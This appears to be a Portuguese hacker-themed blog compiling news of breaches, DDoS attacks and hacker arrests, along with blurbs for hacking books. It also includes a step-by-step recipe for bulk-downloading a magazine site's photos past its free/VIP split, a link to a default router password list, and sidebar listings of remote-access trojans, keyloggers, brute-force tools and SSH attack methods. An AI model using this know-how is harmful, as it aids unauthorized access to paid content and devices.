A música "Don't Let Me Down" está sendo considerada o primeiro solo divulgado do próximo álbum da cantora, que venceu o X Factor, segundo o tablóide britânico The Sun.

"A IFPI está trabalhando com a SyCo e a polícia dos Estados Unidos e Europa para localizar as pessoas que roubaram música de Leona Lewis/Justin Timberlake", disse Jeremy Banks, diretor da Unidade Antipirataria na Internet da IFPI.

"A investigação da polícia prossegue", acrescentou em comunicado. "Esses vazamentos antes do lançamento, de qualquer modo que tenham sido feitos, são altamente prejudiciais a nossos membros que investiram um orçamento considerável em marketing e promoção da música antes de sua divulgação."

Os rendimentos da indústria da música desabaram nos últimos anos em meio à pirataria desenfreada na Internet em algumas regiões. A expansão dos downloads digitais legais não conseguiu compensar as perdas nas vendas físicas de música.

A SyCo é a gravadora do promotor de músicas e jurado de programas de TV de descoberta de talentos Simon Cowell. A empresa é uma divisão da Sony Music Entertainment e tem contratos na televisão britânica.

Lewis venceu o programa The X Factor in 2006 e seu álbum de estréia, "Spirit", ficou no topo das paradas em vários países. Seu segundo álbum está previsto para novembro.

Fonte: oglobo.com

Justiça americana indicia hacker por roubo de 130 milhões de cartões de crédito

2009-08-18T11:02:00.000-03:00

O acusado enfrenta a possibilidade de uma sentença de até 35 anos de prisão

A justiça norte-americana indiciou Albert Gonzales, 28 anos, em Miami, por "hackear" mais de 130 milhões de cartões de crédito e de débito. O invasor - conhecido pelos apelidos "segvec", "soupnazi" e "j4guar17," - atacava redes corporativas de computadores de empresas de varejo e instituições financeiras.

O Departamento de Justiça dos Estados Unidos disse que a violação cometida por Gonzales representa a maior registrada até o momento na história daquele país. "Este inquérito marca o sucesso da lei em seus esforços para coibir os ataques de hackers ao redor do mundo", declarou o procurador, Ralph J. Marra.

Duas grandes redes de varejo norte-americanas, alvos do hacker, são mencionadas no processo. A justiça não divulgou o nome das empresas em questão.

Essa não é a primeira vez que Gonzales é enquadrado. Ele fora acusado em Nova York, em maio de 2008, e em Massachusetts, em agosto do mesmo ano, por envolvimento no roubo de mais de 40 milhões de cartões de crédito e débito

A acusação alega que Gonzales apropria-se de técnicas sofisticadas para evitar detecção que incluem, entre outras medidas, despistar 20 diferentes tipos de sistemas antivírus e apagar rastros digitais.

O acusado enfrenta a possibilidade de uma sentença de até 35 anos de prisão.

Fonte:itweb.com.br

Hackers invadem site da Record, atacam Igreja Universal e estampam logotipo da Globo

2009-08-17T16:28:00.002-03:00

A guerra nada santa entre as redes Globo e Record, com o Ministério Público e um pacote de denúncias contra a Igreja Universal, ganhou mais um capítulo surpresa neste sábado.

Segundo divulgou o Portal UOL, o site da Rede Record (que pertence ao bispo) foi atacado por hackers por volta das 14h40min. Quem tentou acessá-lo deparou-se com palavrões e ofensas contra os bispos da Universal. Até foto sensual de uma mulher, o logotipo da Globo como “patrocinadora” e uma mensagem de apoio à divulgação das denúncias constavam no site. O caso só foi normalizado no começo da noite.

Fonte:uol.com.br

MyTouch 3G também cai na mão dos hackers

2009-08-14T17:01:00.001-03:00

Aparelho da HTC é outro smartphone com Android que pode ser totalmente “aberto”

Pouco depois do HTC Hero , agora é a vez de outro smartphone equipado com o sistema operacional do Google “cair na boca do povo”. O hacker conhecido como “haykuro” postou nos fóruns do site HTCPedia instruções de como conseguir “root”, ou seja, o acesso completo ao sistema operacional, no HTC MyTouch 3G.

O procedimento é mais complexo do que no Hero e envolve a criação do chamado “Gold Card”, um cartão SD especialmente preparado para realizar um update de firmware no aparelho. Infelizmente, nem todos os cartões SD são compatíveis com o procedimento.

As instruções detalhadas incluem o uso do kit de desenvolvimento do Android (Android SDK ), bem como de uma imagem de recuperação do sistema operacional e versões modificadas de vários outros programas, além dos tradicionais comandos em um terminal. Não é preciso dizer que o procedimento é delicado e inclui a substituição de partes do sistema operacional, em alguns casos do sistema operacional completo. Um erro e aquele smartphone novinho vira um lindo peso de papel.

Mas a “cirurgia” tem seus benefícios. Assim como no HTC Hero, o usuário passa a ter à sua disposição uma série de ajustes, como mover a memória virtual e cache do sistema para o cartão SD, que resultam em um ganho considerável de desempenho do aparelho e eliminam muitos pontos de “lag” que eram motivo de reclamação.

Segundo o site Gizmodo, também há outras possibilidades como transplantar para o MyTouch a aclamada interface gráfica Sense, desenvolvida pela HTC para o Hero, assim como já é feito com o primeiro smartphone Android, o T-Mobile G1.

Fonte: www.geek.com.br

Livros / Apostilas

2009-08-14T16:21:00.016-03:00

CURSO DE HACKER

O Curso de Hacker é um livro criado pelo professor Marco Aurélio Thompson. A apostila, visa ensinar os entusiastas de computação como ser um hacker.O livro, chegou a ter sua edição esgotada, e hoje é um dos principais livros para quem deseja aprender como ser hacker. A ideia é passar alguns dos fundamentos éticos, como por exemplo, não usar o conhecimento para o mal.

HACKER INSIDE

Defenda-se contra a invasão do seu micro! Hacker Inside explica tudo sobre o sub mundo hacker e cracker, para que você possa lidar com este problema da Era da Informação: - Espionagem - Keylogger; - Fundamentos de Esteganografia; - Criptografia; - Criptoanálise; - Firewall; - Antivírus; - Senhas e muito mais.

TÉCNICAS HACKERS E SOLUÇÕES PARA SEGURANÇA

Esta obra tem por objetivo desmistificar as técnicas utilizadas pelos Hackers para invadir sistemas computacionais, bem como fornecer as melhores soluções para impedir essas invasões. Esta obra tem uma finalidade puramente didáctica, sendo de grande utilidade para responsáveis por redes de computadores, fornecedores de serviços de Internet e administradores de Intranets, e também estudantes para terem conhecimentos das técnicas que são mais utilizadas pelos Hackers e as principais técnicas utilizadas para prevenir essas invasões.

O GUIA DO HACKER BRASILEIRO

Aprenda todas as técnicas dos hackers para proteger o seu computador ou rede. Com uma linguagem simples e fácil de entender, o Guia do Hacker Brasileiro vai levar você a uma viagem através do mundo digital, fazendo-lhe entender por que as invasões de computadores ocorrem e como podem ser evitadas apenas com o seu conhecimento. Utilizando muitas telas explicativas, exemplos e indicações dos programas mais utilizados atualmente, o Guia do Hacker Brasileiro trata de assuntos como: fundamentos da segurança; scanners de vários tipos; cavalos de tróia e backdoors; Sniffers; DNS, ARP e IP Spoofing; Denial of Service; PGP; Firewall; Windows 9x, NT, 2000, XP; Linux; técnicas avançadas; segredos do DOS; programação e FAQ. Arme-se de conhecimentos úteis sobre a Internet! Não seja mais apenas um civil nessa guerra entre gigantes...

Baixando as fotos do site da revista sexy e mande para seus amigos - atualizado: 24/11/2009

2009-08-14T11:20:00.016-03:00

Entre no site da revista sexy - www.revistasexy.com.br
Ache uma gata de sua escolha e clique nela.

No meu caso, Apimentadas...

Clique e irá aparecer o portfólio dela.

Clique em fotos free/vip

Se preferir "Envie SEXY para 85872 e tenha esta gata no seu celular" ou baixer o complemento do firefox chamdo flashgot. Clique com o botaão esquerdo em cima da foto e clique ->construir galeria

como você pode ver ele baixa todas as fotos de uma só vez. É só mudar onde está marcado em amarelo o número de fotos. neste caso são 30, como é visto na imagem anterior a esta.

Então no nosso caso ficará assim:

http://[201-201;1].[94-94;1].[10-10;1].[66-66;1]/portal/mulheres/apimentadas/fotos/[01-01;1]-apimentadas.jpg
http://[201-201;1].[94-94;1].[10-10;1].[66-66;1]/portal/mulheres/apimentadas/fotos/[01-30;1]-apimentadas.jpg

Agora é só clicar na seta para baixo (Sincronizar regiões) e clicar oK.

Uma abraço!

Twitter volta a ter problemas com novo ciberataque

2009-08-11T19:22:00.001-03:00

Um novo ciberataque deixou o Twitter fora do ar nesta terça-feira, a segunda queda do site neste mês. Na semana passada, o problema durou mais de três horas. Hoje, o novo ataque afetou o site apenas por alguns minutos, embora usuários possam estar experimentando lentidão ou problemas no acesso.

Em seu blog de status, o Twitter disse, na tarde hoje, que estava analisando seus dados de tráfego para determinar a natureza do mais recente ataque. Mais detalhes não foram fornecidos.

Na quinta-feira passada, o acesso ao Twitter foi impossibilitado durante várias horas após hackers dirigirem ataques a um blogueiro da Geórgia que usava o site. Facebook e a rede LiveJournal também foram afetados, mas apenas o Twitter saiu do ar.

Fonte: Terra - http://jbonline.terra.com.br/pextra/2009/08/11/e110819995.asp

Ataque de hackers tira Twitter do ar

2009-08-11T19:18:00.001-03:00

O Twitter ficou algumas horas fora do ar na manhã desta quinta-feira, após ser atingido por uma série de ataque de "negação de serviço". Biz Stone, co-fundador do Twitter, informa no blog oficial do serviço que a empresa está se defendendo da agressão, mas instabilidades ainda podem ser percebidas por diversos usuários. O Facebook também foi atacado e sofreu lentidão por longos períodos do dia, mas não chegou a sair do ar em nenhum momento.

Não se sabe quem são os responsáveis pelo ataque ou quais seriam os seus motivos. Graham Cluley, especialista em segurança da Sophos, não acredita que ele tenha partido de rivais do Twitter. Para ele, é mais provável que a agressão tenha motivações políticas ou seja obra de algum "hacker adolescente em seu quarto com acesso a uma enorme botnet".

"Botnets" são redes de computadores-zumbis, infectadas por códigos maliciosos que são utilizados por hackers quando eles lançam um ataque de negação de serviço. As máquinas funcionam normalmente, até o momento em que o hacker envia um comando remoto ordenando que todas acessem um site ao mesmo tempo, tirando-o do ar por excesso de tráfego.

Em um segundo comunicado no blog, Stone disse preferir não especular sobre a razão do ataque e destacou que não houve danos a dados de usuários.

O número de usuários do Twitter chegou a 44,5 milhões em junho, o que representa um crescimento de 1.460% em relação ao mesmo mês de 2008, de acordo com a comScore. O site de microblogging, que permite aos internautas enviar mensagens de até 140 caracteres a partir de computadores e celulares, ganhou notoriedade ao ser utilizado para protestar contra o resultado das eleições no Irã.

Fonte: http://oglobo.globo.com/tecnologia/mat/2009/08/06/ataque-de-hackers-tira-twitter-do-ar-757135184.asp

Hackers encontram nova brecha no Windows

2008-12-18T09:04:00.003-02:00

Por: Etan Horowitz | Sentinel Escritor 18 de dezembro de 2008

Microsoft Corp atualizou nesta quarta-feira um patch de emergência para corrigir uma grave falha de segurança no Internet Explorer seu navegador da Web que permitiu que hackers para infectar milhões de computadores com vírus e roubar informações pessoais.

Até agora, a vulnerabilidade não levou à infecção generalizada comum há alguns anos. Mesmo assim, uma Central Florida perito disse que foi a mais grave ameaça de segurança de computador em anos.

A falha, descoberto pela primeira vez na China, permite que hackers para infectar o computador de um usuário do Windows através de determinados sites. Até agora, mais de 10000 páginas Web têm sido infectados, com muitos deles dedicados à pornografia e jogos. Segundo o noticiário, a cerca de 2 milhões de computadores foram infectados até o momento.

Ao contrário do passado com o vírus, o usuário não precisa baixar ou clique em nada, e nada aparece na tela para anunciar que você pegou. Mas, uma vez que o computador está infectado, o hacker tem total controle e acesso a tudo, incluindo registros fiscais, senhas bancárias e números de Social Security.

"Tem sido desde há alguns anos temos visto uma coisa assim tão mau", disse Peter Miller, Orange County informações do gerente de segurança. "As implicações de ter o controle completo do computador é muito ruim. A vulnerabilidade é tão simples de se explorar, e, geralmente, mais fácil será para chegar, o que é mais difícil de prevenir".

"Corra, não andará"

Para proteger a si mesmos, o Internet Explorer todos os usuários devem instalar o patch imediatamente e certifique-se de que seu software antivírus está actualizado. O patch pode ser descarregado a partir de microsoft.com/security.

"As pessoas devem correr, e não a pé, e aplicar esse patch porque esta coisa está a ser activamente exploradas por todo o planeta neste momento", disse Paul Ferguson, um avançado-ameaça com a pesquisadora da Trend Micro, uma empresa de segurança de computador na Califórnia.

Ferguson afirmou que os utilizadores têm actualizações automáticas activada não deve aguardar o patch para instalar por si mesmo.

A falha de segurança tem sido caracterizada como um "zero-day vulnerabilidade", o que significa que foi aproveitada imediatamente depois que foi descoberto.

Tipicamente, a Microsoft tem tempo para responder às falhas de segurança e libera correções na segunda terça-feira do mês. Essa falha foi tão grave que a Microsoft decidiu não esperar.

"A vulnerabilidade zero-day é como descobrir a sua casa é desbloqueado e, em seguida, no mesmo dia ladrões estão prontos para se deslocar no interior e roubam suas coisas," disse Miller.

"Em um não-zero-day situação, é como ter o seu porta destrancado, mas ninguém pode entrar em você, porque ainda tenho algumas coisas que protegem a casa, tais como cães, e ele comprou-lhe algum tempo."

Hackers têm utilizar cada vez mais sites para infectar computadores por alguns anos. Por exemplo, no ano passado, os sites de Dolphin Stadium e os Miami Dolphins foi cortada para tentar infectar os computadores de pessoas que visitaram eles.

Miller disse Orange County, foi a falha de monitoramento e, até agora, nenhum dos PCs do concelho cerca de 6000 tenha sido infectado. Quando a Microsoft libera patches, o concelho de TI do pessoal demoram normalmente cerca de um ou dois dias para testar antes de as aplicar patches. Mas, neste caso, Miller disse que iria implantá-lo após apenas uma ou duas horas de teste.

Alex Veletsos, diretor de tecnologia da Saúde em Orlando, disse que ficou muito preocupado quando ele ouviu falar sobre a primeira falha de segurança na semana passada.

"O pior cenário possível que poderia ter sido um intruso poderia ter chegado em nossa rede", disse Veletsos. "Pode causar danos aos computadores, reduzir os servidores e remover as informações fundamentais, sem as pessoas saberem sobre isso."

Casa-PC ataques desvanecimento

De 2003 a 2005, de alto perfil vírus e worms se propagam através dos sítios Internet e e-mail, infectando milhões de computadores pessoais e redes de empresas. Mas, desde então, generalizados ataques maliciosos em computadores têm sido menos comuns. Miller disse que é porque hackers e criadores de vírus têm seu foco em grande parte deslocado para spam e para quebrar o computador em sistemas de grandes corporações.

"Se eu sou um hacker, em vez de tentar invadir seu PC ou o meu PC, prefiro BJ's invadir sistemas de computadores para roubar um monte de números de cartão de crédito", disse ele.

Glen Coffield, presidente da Smart Guys Computadores na Central Florida, disse ainda que não tenha havido tanta atenção mediática sobre vírus informáticos nos últimos anos, o número de clientes com computadores infectados, tem sido crescente.

Os clientes são particularmente vulneráveis nesta época do ano porque há um monte de compras on-line e os hackers criaram sites que parecem uma mistificação shopping portais. Coffield disse que os consumidores deverão fazer compras em sites só eles sabem se são seguros.

Etan Horowitz pode ser contatado pelo ehorowitz@orlandosentinel.com ou 407-420-5447.

E se eu acho que estou afectado?

Hacker rouba dados de hotéis

2008-09-01T23:13:00.001-03:00

Hacker rouba dados de hotéis

Um hacker indiano invadiu, na quinta-feira, o sistema informático de reservas da cadeia de hotéis Best Western, roubando dados pessoais de milhões de clientes. O golpe já é considerado o maior cibercrime de sempre.
Os dados roubados, que incluem moradas, números de telefone, detalhes de cartões de crédito e local de emprego, foram vendidos através de uma rede controlada pela Máfia russa, por um valor que poderá atingir os 3,5 mil milhões de euros.
O hacker terá instalado um "Trojan" numa das máquinas que a Best Western utiliza para as reservas, recolhendo e guardando nomes de utilizadores e palavras-passe.
O ataque afecta todos os clientes que ficaram hospedadas nos hotéis da Best Western desde 2007, um número estimado em 8 milhões de pessoas.
A Best Western corrigiu a falha de segurança na sexta-feira — após ter sido alertada pelo jornal "Sunday Herald", que descobriu o crime - e assegura que vai tomar medidas para proteger os interesses dos seus clientes, mas os especialistas temem que seja demasiado tarde.

Fonte: http://www.jornaldamadeira.pt/not2008.php?Seccao=10&id=103683&sup=0&sdata=

Default Password List

2008-09-01T23:06:00.002-03:00

Lista de TODOS os ADMIN e PASSWORDS Default de modens e roteadores atualizados diariamente.
Link: http://www.phenoelit-us.org/dpl/dpl.html
Enjoy

Mr. Drawer

Como Assistir Megavideo Ilimitado

Falha de Segurança no código fonte permite download das músicas do SONORA

Ataque hacker ao Facebook pode ocorrer no sábado

Boa Sorte!

Microsoft alerta para falha crítica que atinge aplicações em ASP.Net

Hackers que descobriram a vulnerabilidade estimam que 25% de todos os sites estejam sujeitos a ataques devido ao problema.

2ª via OI, Brasil Telecom

Ameaça de "guerra cibernética" tem sido extremamente sensacionalistas

Download CheatEngine

CheatEngine 5.61

Tutoriais

Download Resource Hacker

Site do Ministério do Planejamento é invadido por hacker

Comando Cibernético” do exército norte-americano inclui “código” em logotipo

hackers extraem código de segurança do Skype

Download - OllyDbg - Last update: June 02, 2010 - final release.

Diferentes tipos de vulnerabilidades e ataques de hackers

Ataque de hackers argentinos expõe dados de usuários do Pirate Bay

Invasão revelou endereços de IP, senhas e e-mails, informou blog nesta quinta.Mais de 4 milhões podem ter sido afetados; site diz ter solucionado problema.

SSH: Métodos e ferramentas para invasão - Métodos de ataque

Sequestro de sessões

Ataque de brute force (força bruta)

Ataque man in the middle

Ferramentas de segurança/ataque SSH

Scan (Nmap)

BruteSSH2

Referências

Hacker que revelou falha de segurança do iPad é preso

Hacker muda saudação de call center da Melitta

HACKERS INVADEM SITE DA REDE TV RONDÔNIA

fastcash é uma farça!

Novas notas do REAL evitam falsificação...

Mitnick: a ganância tomou o lugar da curiosidade hacker

Hacker afirma ter desbloqueado PlayStation3

Sites de ONGs chinesas sofrem ataque de hackers

Falha de segurança deixa usuários do Twitter vulneráveis à hackers

Hacker invade página da SuperVia

Introdução de Como funciona o Captcha

Como funciona a tarja magnética dos cartõe de crédito?

Cavalo de Tróia - O que é e como funciona.

Hackers que fizeram história

Kevin Mitnick (Condor)

Tsutomu Shimomura

Tsutomu Shimomura é um cientista da computação e hacker notório. Teve grande influência na captura de Kevin Mitnick, um dos maiores crackers de todos os tempos. Escreveu o livro "Contra-ataque", em que conta como ajudou a prender Mitnick.

Kevin Poulsen (Watchman)

Ver mais....

123456 é senha mais usada na internet

EUA pedem a Pequim investigação sobre ataque a Google

Serviço online descobre senhas para invadir redes Wi-Fi

Supercomputador para estudar mudança no clima

Hacker de 18 anos confessa que aplicou golpes de R$ 1 milhão

FBI diz: Hackers visam escritórios de advocacia / FBI says hackers targeting law firms, PR companies

Hacker invadiu site da ONS dois dias após o apagão

Fontes da CIA afirmam que ataques de hackers já provocaram ao menos dois apagões no Brasil

Hacker troca senha e exige US$ 350 mil

Hacker terá de pagar indenização bilionária por spam no Facebook

Apple fecha a porta para o "jailbreaking"

Hackers podem ter causado falha no sistema do Bilhete Único

Google ameaça processar hacker que criou versão alternativa do Android

Hackers criam rede alternativa de telefonia celular GSM na Holanda

PROGRAMAS HACKER

JOINER

Subseven

Free ToolKit Antivirus Utility

Swift AntiVirus

Brutus

Nmap

Nessus

John the Ripper

MSN Monitor & Sniffer

KGB Keylogger

Password Spectator Lite 1.4

SATAN

Gravadora caça hackers que roubaram música de Lewis/Timberlake

Justiça americana indicia hacker por roubo de 130 milhões de cartões de crédito

Hackers invadem site da Record, atacam Igreja Universal e estampam logotipo da Globo

MyTouch 3G também cai na mão dos hackers

Livros / Apostilas

HACKER INSIDE

Invasão revelou endereços de IP, senhas e e-mails, informou blog nesta quinta.
Mais de 4 milhões podem ter sido afetados; site diz ter solucionado problema.